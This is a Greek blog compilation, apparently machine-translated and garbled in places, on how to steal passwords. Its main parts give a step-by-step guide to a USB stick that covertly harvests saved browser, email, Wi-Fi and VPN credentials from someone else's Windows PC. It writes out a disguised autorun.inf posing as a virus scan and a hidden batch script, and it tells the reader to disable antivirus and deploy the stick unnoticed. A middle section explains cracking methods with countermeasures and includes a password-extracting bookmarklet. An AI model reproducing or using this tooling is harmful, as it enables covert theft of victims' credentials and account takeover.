Πώς μας κλέβουν τους κωδικούς πρόσβασης. Likbez. Πώς να κλέψετε κωδικούς πρόσβασης από τα Windows; Πόσο αληθινή είναι η κλοπή ενός κωδικού πρόσβασης Vkontakte

Πώς να κλέψετε κωδικούς πρόσβασης από τα windows.

Γεια σε όλους, σήμερα θα επιτρέψω στον εαυτό μου να "αγκιστρωθεί" σε ένα άλλο θέμα, το οποίο, μου φαίνεται, θα ενδιαφέρει πολλούς. Θα δημιουργήσουμε ένα ειδικό εργαλείο που θα μας επιτρέπει να εμφανίζουμε και να αποθηκεύουμε όλους τους κωδικούς πρόσβασης που είναι αποθηκευμένοι στα windows. Στο δικό σου ή κάποιου άλλου. Με απλά λόγια, κλέψουν κωδικούς πρόσβασης .

Ας αναπτύξουμε το θέμα. Τι προγράμματα περιήγησης χρησιμοποιείτε; Πόσα είναι στα παράθυρα; Χαζή ερώτηση: χρησιμοποιείτε τα μέσα κοινωνικής δικτύωσης; Άλλα κοινωνικά έργα; Ο καθένας μας έχει πολλούς τέτοιους πόρους. Κάθε ένα από αυτά απαιτεί έναν κωδικό πρόσβασης, ο οποίος είναι αποθηκευμένος στο ίδιο πρόγραμμα περιήγησης. Είναι άνετο. Αλλά δεν είναι ασφαλές, και τώρα θα δείτε γιατί. Υπάρχουν βοηθητικά προγράμματα που θα επιτρέψουν κλέψουν κωδικούς πρόσβασης από προγράμματα περιήγησηςτυχόν λωρίδες για τοποθεσίες.

Ξεχάσατε τον κωδικό πρόσβασης του δρομολογητή σας; Ή μήπως έχεις ξεχωριστό καλώδιο; Καμία διαφορά - το βοηθητικό πρόγραμμα που περιλαμβάνεται στη συσκευασία θα το επιτρέψει κλέψουν κωδικούς πρόσβασης στο Διαδίκτυο. Αγοράσατε Windows ειλικρινά για τα λεφτά σας που κερδίσατε με κόπο; Εγκαταστάθηκε με τον αγορασμένο υπολογιστή και φορητό υπολογιστή; Αλλά κάθε φορά που εισέρχεστε στο δίκτυο, τα Windows ελέγχουν με τη βάση δεδομένων για τα αποτελέσματα της διεξαγωγής. Ένα μοναδικό κλειδί ενεργοποίησης των Windows είναι απαραίτητη προϋπόθεση για τον έλεγχο ταυτότητας. Εκεί που είναι αποθηκευμένο θα μιλήσουμε και εμείς. Υπάρχει ένα εργαλείο που θα επιτρέψει κλέψουν κλειδιά και κωδικούς πρόσβασης στο σύστημα. Θα υπάρχει επίσης ένα κλειδί στο πακέτο. Το γραφείο της Microsoft...

σε πλήρη θέα…

Έχετε προγράμματα-πελάτες email στον υπολογιστή σας; Microsoft Outlook, Filezilla, Mozilla Thunderburd? Όταν εισάγετε την αλληλογραφία, το πρόγραμμα-πελάτη αλληλογραφίας στέλνει κωδικούς πρόσβασης σε γραμματοκιβώτια σε διακομιστές διακομιστών αλληλογραφίας ... Υπάρχει ένα βοηθητικό πρόγραμμα που επιτρέπει κλέψουν κωδικούς πρόσβασης σε γραμματοκιβώτια.

Τώρα θα σας δείξω πώς θα είναι δυνατό να βγάλετε το πιο μυστικό από τα παράθυρα με μερικά μόνο κλικ του ποντικιού.

Και κωδικοί πρόσβασης ακόμη και απομακρυσμένα προγράμματα και προγράμματα περιήγησης σε οποιαδήποτε μορφή.

Πώς να κλέψετε κωδικούς πρόσβασης από τα Windows;

Θα χρησιμοποιήσουμε προγράμματα από NirSoft.Οι προγραμματιστές έχουν πολλά "χρήσιμα" βοηθητικά προγράμματα. Θα εξετάσουμε τώρα εκείνα από αυτά που θα μας βοηθήσουν σε συγκεκριμένες εργασίες. Όλα τα προγράμματα που παρουσιάζονται έχουν φορητή έκδοση, δεν απαιτείται εγκατάσταση. Στον ιστότοπο του κατασκευαστή, μπορείτε επίσης να κάνετε λήψη αρχείων Russification, ωστόσο, για να το κάνετε κλέψουν κωδικούς πρόσβασης από το σύστημα, δεν είναι πολύ σημαντικά.

Για να "κλέψουμε κωδικούς πρόσβασης" από τα Windows, χρειαζόμαστε:

• μια δωρεάν μονάδα flash (μπορεί να χρησιμοποιηθεί για τον προορισμό της, ακόμη και αφού έχει «ακονιστεί» για phishing για κωδικούς πρόσβασης).
• συλλογή πραγματικών προγραμμάτων (μπορείτε να το κατεβάσετε απευθείας από τον ιστότοπό μου)
• μερικούς χειρισμούς με έγγραφα Σημειωματάριο.

• Τα μισά από αυτά τα προγράμματα ορίζονται ως "κακόβουλο λογισμικό" ακόμη και στο στάδιο της λήψης από το πρόγραμμα περιήγησης. Τι μπορούμε να πούμε για τα antivirus... Προτού χρησιμοποιήσετε λοιπόν το εργαλείο που δημιουργήσατε, το antivirus θα πρέπει να είναι ΑΠΕΝΕΡΓΟΠΟΙΗΜΕΝΟ.
• Η εκτέλεση ορισμένων βοηθητικών προγραμμάτων απαιτεί δικαιώματα διαχειριστή

ΕΓΓΥΑΜΑΙ ΟΤΙ Η ΛΗΨΗ ΣΥΝΑΡΜΟΛΟΓΗΣΗΣ ΕΙΝΑΙ ΕΛΕΥΘΕΡΗ ΑΠΟ ΙΟΥΣ. ΟΜΩΣ Η ΦΥΣΗ ΤΗΣ ΔΡΑΣΗΣ ΤΩΝ ΠΡΟΓΡΑΜΜΑΤΩΝ ΕΙΝΑΙ ΟΠΩΣ ΤΗ ΔΡΑΣΗ ΤΩΝ ΣΦΥΛΑΚΩΝ. ΩΣΤΕ ΤΟ ΑΝΤΙ-ΙΟΣ ΝΑ ΑΝΑΦΕΡΕΙ ΠΟΛΛΑΠΛΑ «ΠΡΟΒΛΗΜΑΤΑ».

Ξεκινάμε δουλειά.

• Ας απενεργοποιήσουμε το antivirus. Προσωρινά.
• . Το μάζεψα δύο φορές για να αφιερώσω λίγο χρόνο και να μην πέσω στην «απαγόρευση» των μηχανών αναζήτησης, που δεν τους αρέσουν τέτοια προγράμματα. Κωδικός πρόσβασης για το αρχείο

υπολογιστής 76

• Ετοιμάζουμε τη μονάδα flash. Ναι, δεν υπάρχει τίποτα για να μαγειρέψετε, θα χρειαστεί λίγος χώρος. Γιατί μια μονάδα flash; Είναι φορητό, μερικές φορές μικρό σε μέγεθος και ακόμη και αόρατο. Οι χειρισμοί σας μπορεί να παραμείνουν αόρατοι ακόμα και στο θύμα, το οποίο πρέπει να πάει στην κουζίνα για να πιει καφέ.
• Αποσυμπιέστε τα προγράμματα σε μια μονάδα flash. Όχι σε κανένα φάκελο, αλλά σε απευθείας διαδρομή, ώστε να είναι διαθέσιμα όταν ανοίγετε τη μονάδα flash USB. Τα μη συσκευασμένα βοηθητικά προγράμματα θα εκτελέσουν ένα αρχείο bat με το όνομα αρχή .

Αυτό το αρχείο bat δημιουργήθηκε στο κανονικό Σημειωματάριο. διαβάστε εδώ. Το έγγραφο περιέχει κώδικα για την αυτόματη εκκίνηση βοηθητικών προγραμμάτων και την αποθήκευσή τους σε κατάλληλα αρχεία κειμένου. Μπορείτε να το μετονομάσετε και να δείτε τη σύνθεσή του χρησιμοποιώντας το ίδιο Σημειωματάριο.

Μετά την εκτέλεση του αρχείου δέσμης, καθένα από τα προγράμματα θα ανοίξει σε ένα ξεχωριστό παράθυρο με όλους τους κωδικούς πρόσβασης (ή κάποιου άλλου) ή/και θα προσπαθήσει να δημιουργήσει ένα αρχείο κειμένου που θα εμφανίζει τους κωδικούς πρόσβασης που βρέθηκαν ΛΥΡΙΚΗ ΣΚΗΝΗ, Firefox, Internet Explorer, πελάτες αλληλογραφίας και τα περισσότερα Windows. Όλα θα διαρκέσουν λίγα δευτερόλεπτα. Εξασκηθείτε στον υπολογιστή σας αργά.

Πώς να χρησιμοποιήσετε τις αποκτηθείσες δεξιότητες σωστά, γρήγορα και όσο το δυνατόν πιο διακριτικά στον υπολογιστή κάποιου άλλου, θα εξετάσουμε σε ένα από τα παρακάτω άρθρα.

Διαβάστε: 321

Καλημέρα σε όλους. Η παραμονή της Πρωτοχρονιάς και οι χειμερινές διακοπές τελείωσαν και ήρθε η ώρα να γράψουμε κάτι στο blog. Θέλω να αφιερώσω την πρώτη συμμετοχή φέτος σε ένα εκπαιδευτικό πρόγραμμα σχετικά με τις μεθόδους κλοπής κωδικών πρόσβασης, σε αντίθεση με μια από τις προηγούμενες δημοσιεύσεις: Όταν σε "χακάρουν" δεν είναι απαραίτητο να τρέχεις για να αλλάξεις όλους τους κωδικούς πρόσβασης. Θα πρέπει άμεσα να διευκρινιστεί ότι το υλικό απευθύνεται σε μη ειδικούς στην ασφάλεια των πληροφοριών και είναι μόνο για ενημερωτικούς σκοπούς. Αν και, ίσως, οι ειδικοί θα πάρουν κάτι νέο για τον εαυτό τους.

Όσο κι αν μισούν όλοι τους κωδικούς πρόσβασης, παραμένει το πιο δημοφιλές μέσο αναγνώρισης μέχρι σήμερα, αλλά, δυστυχώς, μερικές φορές μας κλέβουν. Ο έλεγχος ταυτότητας δύο παραγόντων βοηθά στη μερική επίλυση του προβλήματος, αλλά μόνο εν μέρει και μόνο για τις πιο κρίσιμες υπηρεσίες.

Σύμφωνα με στατιστικά στοιχεία, δύο πράγματα είναι οι πιο συνηθισμένοι λόγοι για την απώλεια του ελέγχου των λογαριασμών: η χρήση απλών κωδικών πρόσβασης (λεξικό) και η κοινωνική μηχανική. Σε αυτό το άρθρο, θα μιλήσω για τις κύριες μεθόδους διάρρηξης κωδικού πρόσβασης, φυσικά, προκειμένου να ευαισθητοποιήσω ένα ευρύ κοινό για αυτό το θέμα (η χρήση υλικών για καταστροφικούς σκοπούς τιμωρείται από το νόμο, ο συγγραφέας δεν ευθύνεται, κ.λπ. μπλα μπλα μπλα).

1. μαντεύοντας

Ναι, είναι τόσο απλό. Ο κωδικός πρόσβασής σας μπορεί να μαντέψει ανόητα. Θυμάστε όλα εκείνα τα επεισόδια σε ταινίες του Χόλιγουντ όταν οι χαρακτήρες εισβάλλουν στον υπολογιστή κάποιου και δοκιμάζουν τα ονόματα των παιδιών, των παππούδων, των θείων, των θειών, των ονομάτων των κατοικίδιων του θύματος κ.λπ. ως κωδικό πρόσβασης; Έτσι, αυτή είναι πραγματικά μια από τις αποτελεσματικές μεθόδους hacking, και αυτή η αρχαϊκή μέθοδος εξακολουθεί να είναι αποτελεσματική. Άλλωστε, τώρα ο καθένας δημοσιεύει τόνους πληροφοριών για τον εαυτό του στα κοινωνικά δίκτυα και αν ο κωδικός πρόσβασης βασίζεται σε ορισμένα δεδομένα που σχετίζονται με την ταυτότητα του κατόχου του χακαρισμένου λογαριασμού, τότε η εικασία του κωδικού πρόσβασης είναι θέμα χρόνου (αυτός ακριβώς είναι ο λόγος για τον οποίο οι κωδικοί πρόσβασης πρέπει να αλλάζουν περιοδικά).

Αντίθεση στη μέθοδο: γενικά, ελπίζω να καταλάβατε ότι το "tanyushka1990" είναι ένας κακός κωδικός πρόσβασης, ακόμα κι αν η Tanyushka δεν είστε εσείς, αλλά η αγαπημένη σας εγγονή. Χρησιμοποιήστε μη διαισθητικούς κωδικούς πρόσβασης. Περιοδικά (τουλάχιστον μία φορά το χρόνο) αλλάζετε τους κωδικούς πρόσβασης για τουλάχιστον σημαντικούς λογαριασμούς.

1. κοινωνική μηχανική

Η κοινωνική μηχανική είναι μια ευρεία έννοια. Ένας κοινωνικός μηχανικός μπορεί να αλληλεπιδράσει με το θύμα τόσο αυτοπροσώπως όσο και τηλεφωνικά, αλλά τις περισσότερες φορές αλληλεπιδρά μέσω ηλεκτρονικών καναλιών επικοινωνίας - άμεσων μηνυμάτων, κοινωνικών δικτύων, e-mail. Και εδώ δεν θα εξετάσουμε τις μεθόδους κοινωνικής μηχανικής ως τέτοιες, εδώ θα σας συμβούλευα μάλλον να διαβάσετε τα κλασικά του είδους - το βιβλίο των V. Simon και K. Mitnick "The Art of Deception". Αυτό που είναι σημαντικό εδώ είναι ότι οι μέθοδοι κοινωνικής μηχανικής όσον αφορά την κλοπή κωδικών πρόσβασης στοχεύουν στο να αναγκάσουν το θύμα να εγκαταλείψει το ίδιο τον κωδικό πρόσβασής του. Ένα παράδειγμα μοιάζει με αυτό: ένας εισβολέας συστήνεται ως νέος διαχειριστής συστήματος και λέει σε έναν υπάλληλο στον οργανισμό σας ότι χρειάζεται τον κωδικό πρόσβασης για το email αυτού του υπαλλήλου προκειμένου να εκτελέσει κάποιο είδος σφαιρικών δοκιμών κενού. Ένα άλλο παράδειγμα όταν δεν υπάρχει προσωπική επαφή μεταξύ του εισβολέα και του θύματος: ένα ταχυδρομείο θαυμαστή με σύνδεσμο phishing και μήνυμα συναγερμού (για παράδειγμα, ο λογαριασμός σας έχει αναφερθεί, έχει αποκλειστεί και «πρέπει» να ακολουθήσετε τον σύνδεσμο για να τον ξεμπλοκάρετε). Ο σύνδεσμος phishing οδηγεί σε μια σελίδα που έχει προετοιμαστεί εκ των προτέρων από τον εισβολέα και ένα προς ένα παρόμοια με τη σελίδα εξουσιοδότησης κάποιας δημοφιλής υπηρεσίας, για παράδειγμα: vk.com, gmail.com, facebook.com, κ.λπ. Τι συμβαίνει στη συνέχεια: το θύμα, νομίζοντας ότι αυτή είναι μια νομική υπηρεσία, εισάγει το login και τον κωδικό πρόσβασής του, αυτά τα δεδομένα αναγνώρισης αποστέλλονται στον εισβολέα. ο χρήστης ανακατευθύνεται σε μια πραγματική σελίδα εξουσιοδότησης, επειδή η βρώμικη δουλειά έχει ήδη γίνει και δεν έχει νόημα να διατηρείται το θύμα σε μια ψεύτικη σελίδα. Παρεμπιπτόντως, εάν κάποιος άλλος δεν ξέρει γιατί τα Windows σας ζητούν να πατήσετε το συνδυασμό πλήκτρων Alt-Ctrl-Del πριν συνδεθείτε, σας συμβουλεύω ανεπιφύλακτα να κάνετε google και να διαβάσετε.

Αντιμετώπιση της μεθόδου: συνήθως, οι επιχειρήσεις χρησιμοποιούν υβριδικές μεθόδους αντιμετώπισης της κοινωνικής μηχανικής (σε αυτές τις επιχειρήσεις, φυσικά, όπου γενικά ανησυχούν για θέματα ασφάλειας πληροφοριών), αλλά πρέπει να καταλάβετε ότι εφόσον ένας κοινωνικός μηχανικός μπορεί να αλληλεπιδράσει με το θύμα χωρίς να χρησιμοποιήσει κανένα κανάλι επικοινωνίας (και, κατά συνέπεια, δεν θα μπορούμε να φιλτράρουμε, να μπλοκάρουμε, να παρακολουθούμε τα μηνύματά του), η μόνη πραγματικά αποτελεσματική μέθοδος για την αντιμετώπιση των μηνυμάτων του εργατικών μεθόδων. Πράγματι, αυτές τις μέρες, λίγοι άνθρωποι θα πέσουν στην κληρονομιά ενός Νιγηριανού πρίγκιπα ή σε ένα διαζύγιο.«Μαμά, βάλε χρήματα στον αριθμό XXXX. Θα σας εξηγήσω αργότερα», αλλά μόλις λειτούργησαν αυτές οι μέθοδοι.

1. τιτιβίζοντας

Εδώ θα αναφέρω μόνο εν συντομία τέτοια προφανή πράγματα όπως κωδικούς πρόσβασης σε αυτοκόλλητα που είναι κολλημένα στην οθόνη ή σε κομμάτια χαρτιού κάτω από το πληκτρολόγιο. Εδώ, το peeping μπορεί επίσης να γίνει κατανοητό ως peeping στη διαδικασία πληκτρολόγησης κωδικού πρόσβασης. Δηλαδή, είναι καλύτερο να εισάγετε τον κωδικό πρόσβασης όταν κανείς δεν παρακολουθεί τη διαδικασία. Υπάρχουν άνθρωποι με ενδιαφέρουσες ικανότητες. Για παράδειγμα, ένας από τους γνωστούς μου πόνταρε μαζί μου ότι θα με παρακολουθούσε να πληκτρολογώ τον κωδικό πρόσβασης σε ένα φορητό υπολογιστή και μετά να επαναλάβει ο ίδιος τον κωδικό πρόσβασης. Και πράγματι το έκανε. Ήμουν πολύ έκπληκτος, γιατί έχω την επιλογή κλήσης με δέκα δάχτυλα και μπορώ να εισάγω τον κωδικό πρόσβασής μου πολύ γρήγορα. Αποδείχθηκε ότι ο φίλος είχε κάποια ιδιαίτερη φωτογραφική μνήμη. Επικίνδυνος άνθρωπος =)

Δηλαδή, το peeping βοηθά έναν εισβολέα να αποκτήσει γρήγορα έναν έτοιμο κωδικό πρόσβασης και να μην καταφύγει σε άλλες πιο σύνθετες τεχνικές ή τεχνικές έντασης πόρων, οι οποίες θα συζητηθούν αργότερα. Αλλά το να κρυφοκοιτάζετε τον κωδικό πρόσβασης με "μάτια" δεν είναι ο μόνος τρόπος. Για παράδειγμα, εάν πληκτρολογήσατε τον κωδικό πρόσβασής σας στον υπολογιστή κάποιου άλλου και αποθηκεύσατε κατά λάθος τον κωδικό πρόσβασης, αποσυνδεθήκατε από τον λογαριασμό σας, αλλά δεν διαγράψατε τα δεδομένα, τότε κάποιος άλλος μπορεί όχι μόνο να εισαγάγει τον λογαριασμό σας χωρίς να γνωρίζει τον κωδικό πρόσβασης (αυτό δεν είναι τόσο κακό), αλλά και να εξαγάγει αυτόν τον κωδικό ρητά επικολλώντας αυτό το απλό σενάριο στη γραμμή διευθύνσεων του προγράμματος περιήγησης στη σελίδα όπου εισάγονται τα στοιχεία σύνδεσης και οι κωδικοί πρόσβασης (teridisgus):

javascript:(function()(var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;%20j

[κρύβω]

Εάν ο κωδικός πρόσβασης χρησιμοποιείται σε άλλους λογαριασμούς, τότε ένας εισβολέας μπορεί να αποκτήσει πρόσβαση και σε αυτούς. Αυτός είναι ο λόγος για τον οποίο οι ειδικοί ασφαλείας δεν συνιστούν κατηγορηματικά τη χρήση του ίδιου κωδικού πρόσβασης για διαφορετικούς λογαριασμούς.

Αντίμετρο: Μην εισάγετε τον κωδικό πρόσβασής σας όταν κάποιος στέκεται δίπλα σας και κοιτάζει τα χέρια σας. Μην εισάγετε τον κωδικό πρόσβασής σας σε μη αξιόπιστες συσκευές. Εάν εξακολουθείτε να το κάνετε, φροντίστε να διαγράψετε πληροφορίες σχετικά με κωδικούς πρόσβασης και cookies. Επιπλέον, τα keylogger μπορούν να εγκατασταθούν σε μη αξιόπιστες συσκευές.

1. Επιλογή κωδικού πρόσβασης λεξικού

Έχουμε περάσει ομαλά από τις διαισθητικές και δόλιες τεχνικές παραβίασης κωδικών πρόσβασης σε τεχνικές τεχνικές. Το πρώτο από αυτά είναι η επιλογή κωδικών πρόσβασης χρησιμοποιώντας λεξικά. Ίσως ακόμη και μη ειδικοί στον τομέα της ασφάλειας πληροφοριών να έχουν ακούσει από τις ειδήσεις για μεγάλες διαρροές κωδικών πρόσβασης σε γραμματοκιβώτια σε διάφορες υπηρεσίες αλληλογραφίας. Όπως αποδείχθηκε αργότερα, οι περισσότερες από αυτές τις διαρροές δεν σχετίζονταν με την παραβίαση των διακομιστών του παρόχου υπηρεσιών, αλλά με την απλή επιλογή κωδικών πρόσβασης για γραμματοκιβώτια χρησιμοποιώντας λεξικά. Οι περισσότεροι από τους κωδικούς πρόσβασης των "χακαρισμένων" γραμματοκιβωτίων ήταν συνδυασμοί όπως "123456", "qwerty" και παρόμοια. Στην ενότητα "Υλικά", δημοσίευσα μερικά λεξικά με κωδικούς πρόσβασης (μπορείτε να τα συμπληρώσετε μόνοι σας), τα οποία μπορούν να χρησιμοποιηθούν τόσο σε διάφορα εργαλεία όπως ο John the Ripper ή το Hydra, όσο και για να ελέγξετε εάν ο κωδικός πρόσβασής σας βρίσκεται στο λεξικό με μια απλή αναζήτηση. Αν υπάρχει, τότε το αλλάζουμε επειγόντως!

Αντίθεση στη μέθοδο: χρήση σύνθετων, μη λεξικών κωδικών πρόσβασης.

1. ωμής βίας

Το όνομα της μεθόδου προέρχεται από δύο αγγλικές λέξεις: brute - brute και force - force. Από το όνομα, είναι διαισθητικά σαφές πώς διαφέρει αυτή η μέθοδος από την προηγούμενη - όλοι οι πιθανοί συνδυασμοί κωδικών πρόσβασης απλώς ταξινομούνται εδώ. Η μέθοδος είναι δαπανηρή από άποψη χρόνου και πόρων, επειδή η επιλογή με αυτήν τη μέθοδο απαιτεί σημαντικούς υπολογιστικούς πόρους. Επομένως, οι επιτιθέμενοι καταφεύγουν σε αυτήν τη μέθοδο μόνο σε ακραίες περιπτώσεις. Για παράδειγμα, γνωρίζοντας το ακριβές μήκος του κωδικού πρόσβασης ή γνωρίζοντας ότι ο κωδικός πρόσβασης δεν περιέχει ειδικούς χαρακτήρες και αριθμούς μπορεί να βοηθήσει στη μείωση του χρόνου ωμής βίας. Έτσι, μειώνεται ο αριθμός των πιθανών συνδυασμών.

Αντίθεση στη μέθοδο: χρήση μακροχρόνιων χαοτικών κωδικών πρόσβασης και περιοδικές αλλαγές κωδικών πρόσβασης.

1. ουράνιο τόξο τραπέζια

Όλοι όσοι χρειάστηκε να ανακτήσουν έναν κωδικό πρόσβασης για οποιαδήποτε υπηρεσία τα τελευταία χρόνια θα πρέπει να έχουν προσέξει ότι εάν νωρίτερα ορισμένες υπηρεσίες σας έστειλαν απλώς τον κωδικό πρόσβασής σας μέσω e-mail, τώρα πρέπει να βρείτε αμέσως έναν νέο κωδικό πρόσβασης. Αυτό οφείλεται στο γεγονός ότι καμία υπηρεσία που σέβεται τον εαυτό του δεν αποθηκεύει τους κωδικούς πρόσβασης σε καθαρό κείμενο. Οι κωδικοί πρόσβασης αποθηκεύονται ως κατακερματισμοί. Εν ολίγοις, ένας κατακερματισμός είναι το αποτέλεσμα της μετατροπής ενός κειμένου (στην περίπτωσή μας, ενός κωδικού πρόσβασης) από κάποια μη αναστρέψιμη μαθηματική συνάρτηση. Το αποτέλεσμα της μετατροπής του κοινού αλγορίθμου MD5 στη λέξη "password" (χωρίς εισαγωγικά) είναι το εξής:. Περίπου με αυτή τη μορφή οι πάροχοι υπηρεσιών μας αποθηκεύουν τους κωδικούς μας και δεδομένου ότι πιστεύεται ότι οι λειτουργίες είναι μη αναστρέψιμες, οι ίδιοι οι πάροχοι φαίνεται να μην μπορούν να γνωρίζουν τον κωδικό πρόσβασής μας και να μας τον στέλνουν με σαφές κείμενο. Μπορείτε να διαβάσετε περισσότερα για τον κατακερματισμό.

Οι πίνακες του ουράνιου τόξου, αν μιλώντας πολύ χοντρικά, σας επιτρέπουν να ανακτήσετε έναν κωδικό πρόσβασης μέσω κατακερματισμού. Η πλήρης διαδικασία είναι φυσικά πολύ πιο περίπλοκη από όσο φαίνεται. Επομένως, όσοι ενδιαφέρονται να γνωρίσουν πιο αναλυτικά την τεχνολογία μπορούν να ξεκινήσουν από τη σελίδα της wikipedia. Φαίνεται ότι με τη βοήθεια πινάκων ουράνιου τόξου θα ήταν δυνατό να σπάσει σχεδόν οποιοσδήποτε κωδικός πρόσβασης, αλλά ακόμη και εδώ υπάρχουν δυσκολίες για έναν εισβολέα. Εάν η ωμή βία απαιτεί χρόνο και κόστος πόρων για την ίδια την απαρίθμηση, τότε στην περίπτωση των πινάκων ουράνιου τόξου, το ίδιο χρειάζεται για να δημιουργηθούν αυτοί οι ίδιοι πίνακες. Ταυτόχρονα, οποιοδήποτε σύνολο πινάκων ουράνιου τόξου θα έχει πολλούς περιορισμούς, μεταξύ των οποίων περιλαμβάνονται: περιορισμός στο μήκος του κωδικού πρόσβασης, περιορισμός στο σύνολο χαρακτήρων, περιορισμός σε συγκεκριμένο αλγόριθμο κατακερματισμού. Στο δίκτυο στον δημόσιο τομέα, μπορείτε να βρείτε πίνακες ουράνιου τόξου για εικασία κωδικών πρόσβασης που δεν υπερβαίνουν τους 6 χαρακτήρες, οι οποίοι περιέχουν μόνο γράμματα του αγγλικού αλφαβήτου και στις δύο περιπτώσεις, αλλά χωρίς ειδικούς χαρακτήρες και αριθμούς. Τώρα όμως ζητούν χρήματα για κάτι πιο σοβαρό.

Αντίθεση στη μέθοδο: αλάτισμα κατακερματισμού. Δυστυχώς, αυτός ο τύπος αντιδράσεων είναι διαθέσιμος μόνο σε επίπεδο διαχειριστών υπηρεσιών και δεν εξαρτάται από τις ενέργειες του τελικού χρήστη.

1. Υβριδικές Μέθοδοι

Οι υβριδικές μέθοδοι αναφέρονται σε συνδυασμό των διαφόρων μεθόδων που αναφέρονται παραπάνω, λαμβανόμενες μαζί. Στην πραγματικότητα, ένα παράδειγμα χρήσης των μεθόδων "brute force" + "peep" έχει ήδη δοθεί παραπάνω. Για παράδειγμα, ένας εισβολέας μπορεί να κοιτάξει όχι ολόκληρο τον κωδικό πρόσβασης, αλλά μόνο τους χαρακτήρες που συνθέτουν τον κωδικό πρόσβασης. Αυτό θα του επιτρέψει να καθορίσει μόνο τους απαραίτητους χαρακτήρες στις παραμέτρους κατά τη διάρκεια της ωμής βίας και να αποκλείσει όλους τους υπόλοιπους από την αναζήτηση, μειώνοντας έτσι σημαντικά τον αριθμό των πιθανών συνδυασμών.

Ένα άλλο παράδειγμα υβριδικής μεθόδου: λαμβάνεται μια λέξη λεξικού και τα γράμματα αντικαθίστανται με ειδικούς χαρακτήρες. Για παράδειγμα, λαμβάνεται ο κωδικός πρόσβασης του λεξικού "password" και οι συνδυασμοί "password123", " [email προστατευμένο]”, “pa$$w0rd”, κ.λπ.

Η καταπολέμηση των υβριδικών μεθόδων είναι η χρήση όλων των αντίμετρων που δίνονται παραπάνω.

πραγματικόςφυλάκιση!

Ας προσπαθήσουμε να καταλάβουμε πώς μπορείτε να κλέψετε κωδικούς πρόσβασης από έναν υπολογιστή εάν έχετε πρόσβαση σε αυτόν, αλλά έτσι ώστε το θύμα να μην υποψιάζεται τίποτα.

Ένας τρόπος είναι να δημιουργήσετε μια ειδική μονάδα flash με βοηθητικά προγράμματα που μπορούν να εξαγάγουν κωδικούς πρόσβασης από προγράμματα περιήγησης και άλλα προγράμματα που αποθηκεύουν κωδικούς πρόσβασης για τη διευκόλυνση του χρήστη.

Κατεβάστε τα βοηθητικά προγράμματα ανάκτησης κωδικού πρόσβασης που χρειαζόμαστε:

* MessenPass - ανακτά τους κωδικούς πρόσβασης για τα πιο δημοφιλή προγράμματα ανταλλαγής άμεσων μηνυμάτων: MSN Messenger, Windows Messenger (στα Windows XP), Windows Live Messenger (στα Windows XP και Vista), Yahoo Messenger (Έκδοση 5.x/6.x), ICQ Lite 4.x/5.x/2003, AOL, AOL, AIMXa, και Triumx, AOL, IM, AOL, IMXA και IM;

* Mail PassView - ανακτά αποθηκευμένους κωδικούς πρόσβασης από προγράμματα-πελάτες ηλεκτρονικού ταχυδρομείου: Outlook Express, Microsoft Outlook 2000 (μόνο λογαριασμοί POP3/SMTP), Microsoft Outlook 2002/2003/2007, Windows Mail, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbasil Free, και Web-Group.

* IE Passview - εμφανίζει στοιχεία σύνδεσης και κωδικούς πρόσβασης που έχουν αποθηκευτεί από το "γάιδαρος".

* ChromePass - εμφανίζει στοιχεία σύνδεσης και κωδικούς πρόσβασης που έχουν αποθηκευτεί από το πρόγραμμα περιήγησης Google Chrome.

* PasswordFox - Λαμβάνει όλους τους κωδικούς πρόσβασης που αποθηκεύονται από τον Firefox".

* Protected Storage PassView - ανακτά όλους τους κωδικούς πρόσβασης που είναι αποθηκευμένοι σε ασφαλή αποθήκευση.

* Dialupass - βγάζει όλους τους κωδικούς πρόσβασης των περιόδων σύνδεσης μέσω τηλεφώνου/VPN.

* Network Password Recovery - εμφανίζει τους κωδικούς πρόσβασης που χρησιμοποιείτε για την κοινή χρήση στο τοπικό δίκτυο καθώς και τους κωδικούς πρόσβασης του λογαριασμού .NET Passport/Messenger.

* PstPassword - εξάγει κωδικούς πρόσβασης από αρχεία προσωπικού φακέλου του Outlook - .PST;

* WirelessKeyView - Ανακτά όλα τα κλειδιά ασύρματου δικτύου (WEP/WPA) που είναι αποθηκευμένα στον υπολογιστή σας.

Υπάρχει επίσης το βοηθητικό πρόγραμμα OperaPassView, αλλά δεν υποστηρίζει ακόμη τη γραμμή εντολών. Επομένως, δεν το συμπεριλαμβάνουμε στο σετ μας.
Όλα τα βοηθητικά προγράμματα μπορούν να χρησιμοποιηθούν.

Χρειαζόμαστε επίσης το βοηθητικό πρόγραμμα Hidden Start ().

Θα κάνουμε επίσης λήψη για να συγκαλύψουμε τα βοηθητικά μας προγράμματα. Θα το εκτελέσουμε στο τέλος της λειτουργίας εισβολής κωδικού πρόσβασης. Και μόνο το έργο του θα δει το θύμα στην οθόνη του.

Προετοιμασία φλας.

1. Δημιουργήστε δύο φακέλους στη μονάδα flash:
μονάδα flash:\prog\
μονάδα flash:\prog\log\

2. Στο φάκελο της μονάδας flash: \ prog \ συμπληρώστε όλα τα εκτελέσιμα - βοηθητικά προγράμματα, hstart.exe, KK.exe

3. Στη ρίζα της μονάδας flash, δημιουργήστε ένα autorun.inf με το ακόλουθο περιεχόμενο:

open=prog/hstart /NOCONSOLE "launch.bat"
ACTION= Σάρωση υπολογιστή για ιούς

Εδώ η ενέργεια είναι το κουμπί που θα εμφανίζεται στο παράθυρο επιλογής ενεργειών όταν είναι συνδεδεμένη η μονάδα flash και ανοιχτό είναι η εντολή που πρέπει να εκτελεστεί όταν επιλεγεί αυτή η ενέργεια. Αυτή η εντολή περιλαμβάνει την εκτέλεση του αρχείου δέσμης σε κρυφή λειτουργία χρησιμοποιώντας το βοηθητικό πρόγραμμα Hidden Start.

4. Δημιουργήστε ένα αρχείο δέσμης launch.bat:

ηχώ απενεργοποιημένη
echo %computername%\%username% bte% %time% >> prog/log/_log.txt
start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt
start prog/Dialupass.exe /stext prog/log/%computername%_dialupass.txt
start prog/iepv.exe /stext prog/log/%computername%_iepv.txt
start prog/mailpv.exe /stext prog/log/%computername%_mailpv.txt
start prog/mspass.exe /stext prog/log/%computername%_mspass.txt
start prog/netpass.exe /stext prog/log/%computername%_netpass.txt
start prog/pspv.exe /stext prog/log/%computername%_pspv.txt
start prog/PstPassword.exe /text prog/log/%computername%_pstpassword.txt
start prog/WirelessKeyView.exe /text prog/log/%computername%_wirelesskeyview.txt

Εάν δεν υπάρχει "%programfiles%\Mozilla Firefox\" Μετάβαση στο τέλος
